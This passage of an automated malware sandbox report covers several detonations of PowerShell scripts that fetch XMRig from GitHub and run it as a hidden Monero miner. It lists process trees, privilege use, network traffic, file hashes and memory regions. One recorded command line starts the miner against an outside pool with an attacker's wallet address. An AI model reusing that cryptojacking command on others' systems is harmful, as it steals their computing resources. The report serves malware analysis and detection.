| N/A | N/A | N/A | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3264 wrote to memory of 4852 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 3264 wrote to memory of 4852 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9) - copia.ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=3828 --field-trial-handle=2292,i,2103142837140538807,15881446839139365070,262144 --variations-seed-version /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4088 --field-trial-handle=2292,i,2103142837140538807,15881446839139365070,262144 --variations-seed-version /prefetch:8
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 185.199.109.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.109.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| GB | 96.16.110.114:80 | tcp | |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gulf.moneroocean.stream | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
| US | 8.8.8.8:53 | 109.143.102.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 13.107.253.64:443 | tcp | |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 164.189.21.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 107.211.222.173.in-addr.arpa | udp |
| US | 8.8.8.8:53 | chromewebstore.googleapis.com | udp |
| US | 8.8.8.8:53 | chromewebstore.googleapis.com | udp |
| GB | 216.58.204.74:443 | chromewebstore.googleapis.com | tcp |
| US | 8.8.8.8:53 | 74.204.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 121.150.79.40.in-addr.arpa | udp |
Files
memory/3264-0-0x00007FFE94223000-0x00007FFE94225000-memory.dmp
memory/3264-1-0x0000025EEF860000-0x0000025EEF882000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5pgz2fyk.0yc.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3264-11-0x00007FFE94220000-0x00007FFE94CE1000-memory.dmp
memory/3264-12-0x00007FFE94220000-0x00007FFE94CE1000-memory.dmp
memory/3264-13-0x00007FFE94220000-0x00007FFE94CE1000-memory.dmp
memory/3264-15-0x0000025EEFA10000-0x0000025EEFA22000-memory.dmp
memory/3264-16-0x0000025EEF9F0000-0x0000025EEF9FA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/4852-47-0x0000022132850000-0x0000022132870000-memory.dmp
memory/4852-48-0x0000022134250000-0x0000022134270000-memory.dmp
memory/3264-49-0x00007FFE94223000-0x00007FFE94225000-memory.dmp
memory/3264-50-0x00007FFE94220000-0x00007FFE94CE1000-memory.dmp
memory/4852-51-0x00007FF6D5310000-0x00007FF6D5F43000-memory.dmp
memory/4852-52-0x00007FF6D5310000-0x00007FF6D5F43000-memory.dmp
memory/4852-54-0x0000022134290000-0x00000221342B0000-memory.dmp
memory/4852-53-0x0000022134270000-0x0000022134290000-memory.dmp
memory/4852-55-0x00007FF6D5310000-0x00007FF6D5F43000-memory.dmp
memory/4852-56-0x00007FF6D5310000-0x00007FF6D5F43000-memory.dmp
memory/4852-57-0x00007FF6D5310000-0x00007FF6D5F43000-memory.dmp
memory/4852-58-0x0000022134270000-0x0000022134290000-memory.dmp
memory/4852-59-0x0000022134290000-0x00000221342B0000-memory.dmp
memory/4852-60-0x00007FF6D5310000-0x00007FF6D5F43000-memory.dmp
memory/4852-61-0x00007FF6D5310000-0x00007FF6D5F43000-memory.dmp
memory/4852-62-0x00007FF6D5310000-0x00007FF6D5F43000-memory.dmp
memory/4852-63-0x00007FF6D5310000-0x00007FF6D5F43000-memory.dmp
memory/4852-64-0x00007FF6D5310000-0x00007FF6D5F43000-memory.dmp
memory/4852-65-0x00007FF6D5310000-0x00007FF6D5F43000-memory.dmp
memory/4852-66-0x00007FF6D5310000-0x00007FF6D5F43000-memory.dmp
memory/4852-67-0x00007FF6D5310000-0x00007FF6D5F43000-memory.dmp
memory/4852-68-0x00007FF6D5310000-0x00007FF6D5F43000-memory.dmp
memory/4852-69-0x00007FF6D5310000-0x00007FF6D5F43000-memory.dmp
memory/4852-70-0x00007FF6D5310000-0x00007FF6D5F43000-memory.dmp
memory/4852-71-0x00007FF6D5310000-0x00007FF6D5F43000-memory.dmp
memory/4852-72-0x00007FF6D5310000-0x00007FF6D5F43000-memory.dmp
memory/4852-73-0x00007FF6D5310000-0x00007FF6D5F43000-memory.dmp
memory/4852-74-0x00007FF6D5310000-0x00007FF6D5F43000-memory.dmp
memory/4852-75-0x00007FF6D5310000-0x00007FF6D5F43000-memory.dmp
memory/4852-76-0x00007FF6D5310000-0x00007FF6D5F43000-memory.dmp
memory/4852-77-0x00007FF6D5310000-0x00007FF6D5F43000-memory.dmp
memory/4852-78-0x00007FF6D5310000-0x00007FF6D5F43000-memory.dmp
memory/4852-79-0x00007FF6D5310000-0x00007FF6D5F43000-memory.dmp
memory/4852-80-0x00007FF6D5310000-0x00007FF6D5F43000-memory.dmp
memory/4852-81-0x00007FF6D5310000-0x00007FF6D5F43000-memory.dmp
memory/4852-82-0x00007FF6D5310000-0x00007FF6D5F43000-memory.dmp
memory/4852-83-0x00007FF6D5310000-0x00007FF6D5F43000-memory.dmp
memory/4852-84-0x00007FF6D5310000-0x00007FF6D5F43000-memory.dmp
memory/4852-85-0x00007FF6D5310000-0x00007FF6D5F43000-memory.dmp
memory/4852-86-0x00007FF6D5310000-0x00007FF6D5F43000-memory.dmp
memory/4852-87-0x00007FF6D5310000-0x00007FF6D5F43000-memory.dmp
memory/4852-88-0x00007FF6D5310000-0x00007FF6D5F43000-memory.dmp
memory/4852-89-0x00007FF6D5310000-0x00007FF6D5F43000-memory.dmp
memory/4852-90-0x00007FF6D5310000-0x00007FF6D5F43000-memory.dmp
memory/4852-91-0x00007FF6D5310000-0x00007FF6D5F43000-memory.dmp
memory/4852-92-0x00007FF6D5310000-0x00007FF6D5F43000-memory.dmp
memory/4852-93-0x00007FF6D5310000-0x00007FF6D5F43000-memory.dmp
memory/4852-94-0x00007FF6D5310000-0x00007FF6D5F43000-memory.dmp
memory/4852-95-0x00007FF6D5310000-0x00007FF6D5F43000-memory.dmp
memory/4852-96-0x00007FF6D5310000-0x00007FF6D5F43000-memory.dmp
memory/4852-97-0x00007FF6D5310000-0x00007FF6D5F43000-memory.dmp
memory/4852-98-0x00007FF6D5310000-0x00007FF6D5F43000-memory.dmp
memory/4852-99-0x00007FF6D5310000-0x00007FF6D5F43000-memory.dmp
memory/4852-100-0x00007FF6D5310000-0x00007FF6D5F43000-memory.dmp
memory/4852-101-0x00007FF6D5310000-0x00007FF6D5F43000-memory.dmp
memory/4852-102-0x00007FF6D5310000-0x00007FF6D5F43000-memory.dmp
memory/4852-103-0x00007FF6D5310000-0x00007FF6D5F43000-memory.dmp
memory/4852-104-0x00007FF6D5310000-0x00007FF6D5F43000-memory.dmp
memory/4852-105-0x00007FF6D5310000-0x00007FF6D5F43000-memory.dmp
memory/4852-106-0x00007FF6D5310000-0x00007FF6D5F43000-memory.dmp
memory/4852-107-0x00007FF6D5310000-0x00007FF6D5F43000-memory.dmp
memory/4852-108-0x00007FF6D5310000-0x00007FF6D5F43000-memory.dmp
memory/4852-109-0x00007FF6D5310000-0x00007FF6D5F43000-memory.dmp
memory/4852-110-0x00007FF6D5310000-0x00007FF6D5F43000-memory.dmp
memory/4852-111-0x00007FF6D5310000-0x00007FF6D5F43000-memory.dmp
memory/4852-112-0x00007FF6D5310000-0x00007FF6D5F43000-memory.dmp
memory/4852-113-0x00007FF6D5310000-0x00007FF6D5F43000-memory.dmp
memory/4852-114-0x00007FF6D5310000-0x00007FF6D5F43000-memory.dmp
memory/4852-115-0x00007FF6D5310000-0x00007FF6D5F43000-memory.dmp
memory/4852-116-0x00007FF6D5310000-0x00007FF6D5F43000-memory.dmp
memory/4852-117-0x00007FF6D5310000-0x00007FF6D5F43000-memory.dmp
Analysis: behavioral7
Detonation Overview
Submitted
2024-05-28 01:50
Reported
2024-06-10 15:58
Platform
win10v2004-20240508-en
Max time kernel
1790s
Max time network
1799s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (11) - copia.ps1"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
Files
memory/1932-0-0x00007FFCCB8F3000-0x00007FFCCB8F5000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_jy0xdoh1.oqr.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/1932-6-0x0000021A9F580000-0x0000021A9F5A2000-memory.dmp
memory/1932-11-0x00007FFCCB8F0000-0x00007FFCCC3B1000-memory.dmp
memory/1932-12-0x00007FFCCB8F0000-0x00007FFCCC3B1000-memory.dmp
memory/1932-13-0x00007FFCCB8F0000-0x00007FFCCC3B1000-memory.dmp
memory/1932-14-0x00007FFCCB8F0000-0x00007FFCCC3B1000-memory.dmp
memory/1932-15-0x00007FFCCB8F0000-0x00007FFCCC3B1000-memory.dmp
memory/1932-16-0x00007FFCCB8F3000-0x00007FFCCB8F5000-memory.dmp
memory/1932-17-0x00007FFCCB8F0000-0x00007FFCCC3B1000-memory.dmp
memory/1932-18-0x00007FFCCB8F0000-0x00007FFCCC3B1000-memory.dmp
Analysis: behavioral17
Detonation Overview
Submitted
2024-05-28 01:50
Reported
2024-06-10 16:10
Platform
win10v2004-20240508-en
Max time kernel
1795s
Max time network
1802s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (14) - copia.ps1"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=3804,i,1809100026287847100,9768898026582633513,262144 --variations-seed-version --mojo-platform-channel-handle=4024 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=996,i,1809100026287847100,9768898026582633513,262144 --variations-seed-version --mojo-platform-channel-handle=4056 /prefetch:8
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
Files
memory/4540-0-0x00007FF94B5A3000-0x00007FF94B5A5000-memory.dmp
memory/4540-1-0x000001DDC9B70000-0x000001DDC9B92000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_diw4zaux.zei.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4540-11-0x00007FF94B5A0000-0x00007FF94C061000-memory.dmp
memory/4540-12-0x00007FF94B5A0000-0x00007FF94C061000-memory.dmp
memory/4540-13-0x00007FF94B5A0000-0x00007FF94C061000-memory.dmp
memory/4540-14-0x00007FF94B5A0000-0x00007FF94C061000-memory.dmp
memory/4540-15-0x00007FF94B5A0000-0x00007FF94C061000-memory.dmp
memory/4540-16-0x00007FF94B5A3000-0x00007FF94B5A5000-memory.dmp
memory/4540-17-0x00007FF94B5A0000-0x00007FF94C061000-memory.dmp
Analysis: behavioral21
Detonation Overview
Submitted
2024-05-28 01:50
Reported
2024-06-10 16:11
Platform
win10v2004-20240508-en
Max time kernel
1582s
Max time network
1591s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (15) - copia.ps1"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
Files
memory/2236-0-0x00007FFCFA0A3000-0x00007FFCFA0A5000-memory.dmp
memory/2236-10-0x0000021B9B560000-0x0000021B9B582000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xndcpwrw.vnd.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2236-11-0x00007FFCFA0A0000-0x00007FFCFAB61000-memory.dmp
memory/2236-12-0x00007FFCFA0A0000-0x00007FFCFAB61000-memory.dmp
memory/2236-13-0x0000021BB3B00000-0x0000021BB3D1C000-memory.dmp
memory/2236-14-0x00007FFCFA0A0000-0x00007FFCFAB61000-memory.dmp
memory/2236-15-0x00007FFCFA0A0000-0x00007FFCFAB61000-memory.dmp
memory/2236-17-0x00007FFCFA0A3000-0x00007FFCFA0A5000-memory.dmp
memory/2236-18-0x00007FFCFA0A0000-0x00007FFCFAB61000-memory.dmp
memory/2236-19-0x00007FFCFA0A0000-0x00007FFCFAB61000-memory.dmp
Analysis: behavioral24
Detonation Overview
Submitted
2024-05-28 01:50
Reported
2024-06-10 16:14
Platform
win11-20240508-en
Max time kernel
1651s
Max time network
1660s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (15) - copia.ps1"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
Files
memory/1436-0-0x00007FFE06133000-0x00007FFE06135000-memory.dmp
memory/1436-1-0x000002425C8E0000-0x000002425C902000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_uuijxreg.sde.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/1436-10-0x00007FFE06130000-0x00007FFE06BF2000-memory.dmp
memory/1436-11-0x00007FFE06130000-0x00007FFE06BF2000-memory.dmp
memory/1436-12-0x00007FFE06130000-0x00007FFE06BF2000-memory.dmp
memory/1436-13-0x00007FFE06133000-0x00007FFE06135000-memory.dmp
memory/1436-14-0x00007FFE06130000-0x00007FFE06BF2000-memory.dmp
Analysis: behavioral4
Detonation Overview
Submitted
2024-05-28 01:50
Reported
2024-06-10 15:50
Platform
win11-20240426-en
Max time kernel
1799s
Max time network
1794s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1352 wrote to memory of 1800 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 1352 wrote to memory of 1800 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (10) - copia.ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
| US | 52.111.229.48:443 | tcp |
Files
memory/1352-0-0x00007FFA4ADF3000-0x00007FFA4ADF5000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_sygrxq5o.m5a.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/1352-9-0x00000236F1A90000-0x00000236F1AB2000-memory.dmp
memory/1352-10-0x00007FFA4ADF0000-0x00007FFA4B8B2000-memory.dmp
memory/1352-11-0x00007FFA4ADF0000-0x00007FFA4B8B2000-memory.dmp
memory/1352-12-0x00007FFA4ADF0000-0x00007FFA4B8B2000-memory.dmp
memory/1352-14-0x00000236F20A0000-0x00000236F20B2000-memory.dmp
memory/1352-15-0x00000236F1F90000-0x00000236F1F9A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/1800-46-0x0000018BB6450000-0x0000018BB6470000-memory.dmp
memory/1800-47-0x0000018BB64A0000-0x0000018BB64C0000-memory.dmp
memory/1800-48-0x00007FF7C1860000-0x00007FF7C2493000-memory.dmp
memory/1800-53-0x0000018C4A400000-0x0000018C4A420000-memory.dmp
memory/1800-52-0x0000018C4A3E0000-0x0000018C4A400000-memory.dmp
memory/1800-49-0x00007FF7C1860000-0x00007FF7C2493000-memory.dmp
memory/1352-51-0x00007FFA4ADF0000-0x00007FFA4B8B2000-memory.dmp
memory/1352-50-0x00007FFA4ADF3000-0x00007FFA4ADF5000-memory.dmp
memory/1800-54-0x00007FF7C1860000-0x00007FF7C2493000-memory.dmp
memory/1800-55-0x00007FF7C1860000-0x00007FF7C2493000-memory.dmp
memory/1800-56-0x0000018C4A3E0000-0x0000018C4A400000-memory.dmp
memory/1800-57-0x0000018C4A400000-0x0000018C4A420000-memory.dmp
memory/1800-58-0x00007FF7C1860000-0x00007FF7C2493000-memory.dmp
memory/1800-59-0x00007FF7C1860000-0x00007FF7C2493000-memory.dmp
